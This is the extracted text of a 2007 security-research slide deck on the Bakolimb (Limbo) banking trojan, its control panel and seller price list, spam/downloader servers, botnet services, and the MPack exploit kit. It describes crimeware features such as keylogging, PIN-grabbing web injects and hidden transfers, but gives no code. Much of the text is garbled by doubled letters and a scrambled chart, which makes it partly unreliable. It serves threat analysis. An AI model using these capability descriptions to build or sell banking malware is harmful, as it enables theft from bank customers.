Once upon a time a Trojan…

Luis Corrons 09/21/2007

1 Once upon a time a Trojan…

TThhee TTrroojjaann

2 Once upon a time a Trojan…

TheThe TrojaTrojann

 First discovered January, 2007 via “Targeted Attack Alert Services”

 Affects multiple financial institutions

 Detected as Bakolimb, also known as Limbo or Nethell.

Consists of 3 main components – Helper.XML – Helper.DLL

– Control Server and Control Panel 3 Once upon a time a Trojan…

TheThe TrojaTrojann

 DLL

 BHO (Browser Helper Object)  Keylogger  Creates a UniqueID per infected machine. Uses this UID to communicate with the Control Server and to receive commands from it  Client <-> server communication via PHP scripts  Delete cookies  Info stored in text files. As soon as it connects send TXT file

4 Once upon a time a Trojan…

TheThe TrojaTrojann

 XML

 Code to be injected in websites

 Encrypted in latest versions

5 Once upon a time a Trojan…

XML

6 CCoonnttrrooll PPaanneell

7 Once upon a time a Trojan…

ControlControl PaPanneell

 UserUser AdmiAdminn

 CommCommanandd AAdmidminn

 SeaSearcrchh inin logslogs

 InInfefectct ststaattss

 EtcEtc..

8 Once upon a time a Trojan…

ControlControl PaPanneell

9 Once upon a time a Trojan…

ControlControl PaPanneell

10 Once upon a time a Trojan…

ControlControl PaPanneell

-- ComCommanmandd exexecuecuttiionon aanndd monmoniittorizaorizattiionon..

-- ComCommanmandsds aarere ququeueueedd iinn casecase cliclienentt iiss notnot conconnnectecteedd..

11 Once upon a time a Trojan…

ControlControl PaPanneell

12 Once upon a time a Trojan…

ControlControl PaPanneell

13 Once upon a time a Trojan…

ControlControl PaPanneell

14 Once upon a time a Trojan…

ControlControl PaPanneell

15 DDaattaa SSttoolleenn

16 Once upon a time a Trojan…

DaDattaa ststoleolenn

17 TTrroojjaann’’ss AAuutthhoorr

18 Once upon a time a Trojan…

Trojan’s Author

 GoogleGoogle

 SelSelllss eveveerrytythhiningg (T(Trojarojann && ConConttrrooll PanPaneel)l)

 EveryEverytthhiinngg iiss welwelll docdocumenumentteedd

 AdvAdvertertiisseedd iinn didifferenfferentt foruforummss (al(alll RuRusssiasiann))

 PPricerice:: 11000000 –– 335500 wmzwmz

19 Once upon a time a Trojan…

TrojaTrojan’n’ss AAuthoruthor

– logging of virtual keyboards stealing of keys (bankofamerica but also of other banks which have key-based security system)

– scam (aka fake pages with substitution of the IE address bar and status bar)

– setting filters for sites which should not be grabbed

– code inject - to add your own text box into a particular site, e.g. for getting the holder's PIN

20 Once upon a time a Trojan…

TrojaTrojan’n’ss AAuthoruthor

For an additional fee:

– Hidden transfer (transfer on command by the admin software) - adapted SPECIFICALLY for one particular bank

– Automatic download (e.g. when the user makes a transfer the Trojan substitutes your account completely or a drop and the appropriate sum) - useful if the transfer requires an SMS confirmation. Adapted specifically for a particular bank.

21 Once upon a time a Trojan…

TrojaTrojan’n’ss AAuthoruthor

- Antivirus software removal - 40 wmz - Reprogramming to a different host - 40 wmz

- Build - 1000 wmz

In addition, there is an option to buy a local parser for logs, separately. For all questions please contact me via ICQ.

There are plans for sales of the builder. Estimated price: 3500 wmz. .

22 SSeerrvveerrss

23 Once upon a time a Trojan…

SServerversers

 GoogleGoogle

 SeveralSeveral servserveerrss

 GroGroupupss ooff sseervrversers belbelonongedged ttoo didifferenfferentt hhaacckekerrss

 ““SuSushshii”” serserverver

24 Once upon a time a Trojan…

 ““SuSushshii”” serserverver

InTfoetcatle Idn fCeoctmedp uCtoermsp puetre Drsay

50003000 45000 400020500 35000 30002000 25000 200010500 15000 1000 10000 5000 500 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 e 0 0 0 t 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 a : : : : : : : : : : : : : : : : : : : : : : 0 0 0 0 0 0 0 0 0

0 D

0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / 1 1 1 1 2 2 2 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 2 2 2 2 2 2 2 2 2 1 1 1 1 2 2 2 2 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / / 7 1 5 9 6 0 4 5 9 3 7 1 2 4 6 8 0 2 4 8 2 6 4 6 8 2 4 6 8 1 3 5 7 1 3 5 7 1 3 5 7 0 0 9 9 1 1 1 2 2 2 2 2 3 0 0 0 0 1 1 1 1 1 2 2 2 2 1 1 1 2 2 2 2 2 3 0 0 0 0 0 1 1 1 1 1 2 2 2 2 25 Once upon a time a Trojan…

 ““SuSushshii”” serserverver

26 Once upon a time a Trojan…

 ““SuSushshii”” serserverver

 Win32.exe = Trojan downloader

 February 28th, 2007

 InInststalallled:ed:  Trj/Spammer.ZO  Adware/Bravesentry  Application/Bravesentry

27 Once upon a time a Trojan…

 ““SuSushshii”” serserverver

 Earning money via sending spam and promoting rogue antispyware

 Everyday there was a new downloader that installed different malware

 We finally managed to take the server down

28 Once upon a time a Trojan…

 ““SuSushshii”” serserverver

 Who pays?

29 Once upon a time a Trojan…

 ““SuSushshii”” serserverver

 Who pays?

 How much?  USA $0.30  Canada & UK $0.10  Western Europe $0.03  Other Countries$0.02

30 Once upon a time a Trojan…

 ““SuSushshii”” serserverver

 Let’s do some maths 

Other Countries: $0.02 * 43,323 = $966.46 Western Europe: $0.03 * 43,323 = $1,299.69 Canada & UK: $0.10 * 43,323 = $4,332.30 USA: $0.30 * 43,323 = $12,996.90

Other Countries: $0.02 * 43,323 *20 = $19,329 Western Europe: $0.03 * 43,323 *20 = $25,993 Canada & UK: $0.10 * 43,323 *20 = $86,646 USA: $0.30 * 43,323 *20 = $259,938

31 IInnffeecctteedd TTeeaamm

32 Once upon a time a Trojan…

InInffeectcteded TeaTeamm

33 Once upon a time a Trojan…

InInffeectcteded TeaTeamm

 ValValuuee addeaddedd servserviicceess

 Proxy sales  5 - $2.5  1,000 - $300

 DDoS  1 hour - $20  1 day - $100  Major projects starting at $200  10 minutes for free!

34 Once upon a time a Trojan…

InInffeectcteded TeaTeamm

 ValValuuee addeaddedd servserviicceess

 Spam – Russia (enterprises): 5,000,000 – US$120 / million messages – Russia (home users), Ukraine and CIS: 20,700,000 – US$100 / million messages – USA: 121,000,000 – US$150 / million messages – Western Europe: 45,902,256 – US$130/million messages

TTototaall:: 191922,0,0000,0,000000

35 Once upon a time a Trojan…

InInffeectcteded TeaTeamm

 SoftSoftwawarree

 Personal cryptor ($15, updates $5)

 ABLoader ($60, builder $500)

 RooT iFrame ($25 Russian, $50 English)

 SpamPHP Script ($2)

 FTPCheckIframe ($25)

36 ““CCooooll”” ssttuuffff ffoouunndd oonn tthhee sseerrvveerrss

37 Once upon a time a Trojan…

““Cool”Cool” sstuftufff ffoundound onon tthhee servserversers  IDPIDPaacckk

Plastic ID card Support Double Side ID Card Printer Simulate Double Side Card Printer Signature Pad Fingerprint Reader Magnetic Stripe Encoder Smartcard Contact Station Fast and easy to use Design an unlimited number of badges User-friendly interface Unlimited badge formats Flexible layouts: PVC, 1000 Avery, 36 Zebra/Citizen and 40 DYMO LabelWriter label formats. Takes pictures from a Webcam, a CamTracer or imports it from file Powerful print management Operates in local and network setups High production volume 14 security levels with color codes 28 types of barcodes built in 38 Once upon a time a Trojan…

““Cool”Cool” sstuftufff foundfound onon tthehe servserversers

 PPhhiishshiinngg

39 Once upon a time a Trojan…

40 Once upon a time a Trojan…

CoolCool ststuffuff ffououndnd onon tthehe seserverversrs

 DDreareamm DDownownloaloaderder

41 Once upon a time a Trojan…

CoolCool ststuffuff ffououndnd onon tthehe seserverversrs

 HowHow coucoulldd ththeeyy manmanaagege ttoo ininfectfect tthhouousansanddss ooff compucomputters?ers?

42 MMPPaacckk

43 Once upon a time a Trojan…

MPack

44 Once upon a time a Trojan…

MPack

 TTraciracinngg MpaMpackck forfor 22 momonnththss (A(Apriprill && MayMay 2200007):7):

 41 different servers with Mpack running

 366,717 web pages “iframed”

 More than 1 million users infected (1,217,741)

45 Once upon a time a Trojan…

MPack

 TToolool ttoo insinsttaallll mmalalwareware

 WrWriitttteenn iinn PPHHPP

 DDeevveelopelopedd byby ““DDreareamm CoCoddeerrss TeaTeam”m”

 PPricerice $$770000 ($($1,1,000000 iinnclucludidinngg DrDreeamam DDownownlloaoaddeerr))

46 Once upon a time a Trojan…

MMPPaackck

 AddinAddingg nnewew eexplxploioitt:: $5$500 -- $1$15500

 AvAvoioidd AVAV detdeteecctiontion:: $$2200 –– $$3300

47 Once upon a time a Trojan…

MMPPaackck

 MaMannyy ddiffereifferenntt exexplploitsoits::

 WebViewFolderIcon overflow

 WinZip ActiveX overflow

 QuickTime overflow

 ANI overflow

 Etc.

48 Once upon a time a Trojan…

MMPPaackck

 MostMost uusedsed wawayy ttoo iinnfectfect uusseerrs:s: iframiframee